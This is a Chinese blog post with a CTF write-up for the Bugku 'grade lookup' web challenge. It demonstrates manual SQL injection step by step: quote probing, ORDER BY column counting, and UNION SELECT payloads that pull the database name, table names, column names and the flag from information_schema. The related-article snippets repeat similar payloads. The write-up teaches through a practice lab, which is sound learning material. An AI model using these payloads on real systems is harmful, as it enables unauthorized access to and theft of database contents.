bugku web 成绩查询

最新推荐文章于 2024-06-03 21:49:45 发布
最新推荐文章于 2024-06-03 21:49:45 发布
阅读量181 收藏
点赞数
分类专栏: bugku 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cuddlylm/article/details/118227283
版权

在这里插入图片描述
输入1试试
在这里插入图片描述

输入2的回显
在这里插入图片描述
输入3的回显
在这里插入图片描述
怀疑是sql注入
输入1'的回显,报错
在这里插入图片描述

1 and 1=1

回显如下
在这里插入图片描述
就可以确定时sql注入里的整数型注入了
1、查字段用order by
先试试id=1' order by 4#
在这里插入图片描述

' 闭合前面的句子,用 # 注释后面的句子
再试试id=1' order by 5#
在这里插入图片描述
没有回显,就说明这里只有四个字段。
2、然后就是要看它的显位点有几个,用id=-1' union select 1,2,3,4#,这里用id=-1时因为如果用id=1或者其他数据库里面有的字段,回显就会给出数据库里的数据,我们就不能查询出我们本来要查询的数据了
在这里插入图片描述
可以看到显位点分别时2,3,4
3、接下来就要查询数据库名(爆库)

id=-1' union select 1,database(),user(),version()#

在这里插入图片描述
数据库名为skctf
4、爆表

id=-1' union select 1,group_concat(table_name),user(),version() from information_schema.tables where table_schema=database()#

在这里插入图片描述
爆出两个表名,分别时是fl4g,sc
5、爆列名

id=-1' union select 1,group_concat(column_name),user(),version() from information_schema.columns where table_name='fl4g'#

在这里插入图片描述
6、最后就是查数据了

id=-1' union select 1,skctf_flag,user(),version() from fl4g#

在这里插入图片描述
典型的整数型注入

cyphersec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bugku-成绩查询
qq_56611811的博客
05-17 421
进入题目差不多能够猜到是关于sql注入的题,1'没有返回结果,1'#能够成功查询,这说明注释符是有效果的。2.当num是5时无法回显内容,说明表可能有4列。
BUGKU CTF--web 基础{成绩查询}
lulu001128的博客
12-03 867
BUGKU CTF--web 基础{成绩查询}解题过程
Bugku---web---成绩查询
最新发布
weixin_47450099的博客
06-03 540
sql注入相关知识,内有各种爆破语句
bugku 成绩查询
m0_73721944的博客
12-22 381
这意味着 -d "skctf" 这部分的语法有问题。但报错了(看别人的wp爆出的库是skctf_flag,不知道为什么,我查询语句时也是skctf)按照我查询到的库skctf,字段skctf_flag。一个数据库skctf(估计flag就在里面)skctf中只有两个表 fl4g,sc。大佬的wp确实有,也许是现在做了修改。我想用下面的语句爆skctf中的库。说明库确实是skctf_flag。所以skctf_flag是表?得到了两个表,fl4g和sc。爆出了三个库,五十三个表。发现了一个库skctf。
【CTF-webbugku-成绩查询(sql注入)
Sankkl1的博客
08-17 580
再测试,当id为1’时,无数据,而当id为1’#时,又正确返回了数据,推测构造的数据库查询语句可能是类似。查询skctf库中的表的名称,结果其中有一个表名为fl4g,很可能其中就包含了flag。查询fl4g表中的列名,发现其中有一列的名称为skctf_flag。如上图所示,当id为1时返回名字为“龙龙龙”的成绩单。我们要找到能返回能够返回我们需要的信息的位置,当。时,数据不显示,可以知道一列数据有4列。时,我们可以查询到库名,如下图所示。这样的,其中XX为传入的参数。时,可以正常显示,直到。
Bugku 成绩查询
m0_63711447的博客
04-07 877
这道题按照正常的SQL注入步骤进行即可,没有绕弯弯的地方 1、打开题目环境,在输入框中输入数字1得到成绩回显,输入2和3也能得到相应的回显 2、测试参数包裹方式,输入1'没有得到回显 输入1'#进行注释,得到回显 3、用order by语句测试有几列,输入1' order by 4#时有回显,order by 5时无回显,说明有四列 4、接下使用联合查询语句测试有几个回显点,注意将前面的参数值置换为空,由图可知有三个回显点 5、查库名 输入-1'union select 1,2,3,g
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugku题的web类解析
01-29
这个是我自习写的bugkuweb的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
bugku web题INSERT INTO注入.docx
05-16
bugku web题INSERT INTO注入 明确注入点,是走的http报头的x-forwarded-for。  我尝试了bool型注入,发现自己构造的语句在自己数据库中会报错,但是这里并没有错误报告,因此考虑基于时间的盲注
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
web留言板
06-06
Web留言板 (0分) 设计一个简单的基于Web的留言板,要求如下:1)系统中所有页面,如果用户没登录,则让用户返回到登录页面login.jsp(说明:login.jsp页面填写用户的用户名和密码);2)留言板(message.jsp)页面中...
成绩查询系统
02-26
软件效益: 1、本系统为考生查询自己的成绩提供了方便。 2、本系统为班主任,和考试单位提供成绩查询提供了方便。 3、新增班主任管理。 4、教导处统一管理成绩,班主任只可以查本班的成绩,学生只可以查本人成绩。 5、可以多次批量导入成绩。 用户使用方法: 1、用户可以根据自己的报考信息查询成绩,譬如依靠考号和姓名。 2、用户可以输入自己的电子邮箱订阅成绩查询信息,系统会在公布成绩后给你发邮件,告诉您最新的成绩查询公告。 管理员使用方法: 1、管理员根据考试需求,制出excel样表。 2、管理员根据excel样表,和查询条件,对程序代码进行局部改动。 3、管理员把和样表格式一致的成绩信息表excel汇总出来。 4、管理员后台直接导入到数据库,学生和考生就可以使用成绩查询系统了。 5、管理员通过群发邮件,告诉订阅考试信息的学生成绩公告。 管理员帐号入口: 进入管理 用户名:admin 密码:123456a
Bugku-web成绩查询
weixin_42939822的博客
03-14 3434
今天是一道地地道道的sql注入题目,通过手动注入不仅可以加深对于sql语句的应用,也能够通过实战了解sql语句的运作,更好地体会到sql注入漏洞存在的潜在危害!!!ctf小白之旅继续前行!!!
Bugku Web CTF-学生成绩查询
No Title
12-16 1195
Bugku Web CTF-学生成绩查询 该题解题思路是SQL注入,测试思路如下:。 直接输入’单引号没有回显; 输入’#有回显; 通过union来猜解该表有多少列: 0' union select 1,2,3,4# 可正常回显,其余不行,猜测该表有4列,分别为id,Math,English,Chinese。 获取数据库名: 0' union select 1,user(),database()...
BugKu——Web——成绩查询
m_de_g的博客
09-02 1919
BugKu——Web——成绩查询 1.拿到题目先测试注入点,分别输入了1,2,3,4;输入到4的时候没有回显 2.当我们输入1'时会报错,而我们使用1'#时就不会报错 3.测试or,and等关键字 1' or 1=1# 1' and 1=2# 发现没有被过滤 4.判断列名 1' order by 1,2,3# 三列,四列的时候依然回显正常,而当我们输入第五列的时候报错,说明有四列1' order by 1,2,3,4,5# 5.查看显位点 -1' union select 1,2,3,4#
BugKu_web17(成绩查询
羽的博客
05-08 337
成绩查询,数据库交互,那就在考察SQL注入漏洞。 正常输入1,2,3试试。 就正常步骤判断是否存在sql注入。 输入1 有反应 输入1’ 没有反应 判断是数字型注入
bugku sodirty
09-03
- *1* *3* [Bugku解题 web 【四】](https://blog.csdn.net/weixin_46703850/article/details/115184847)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值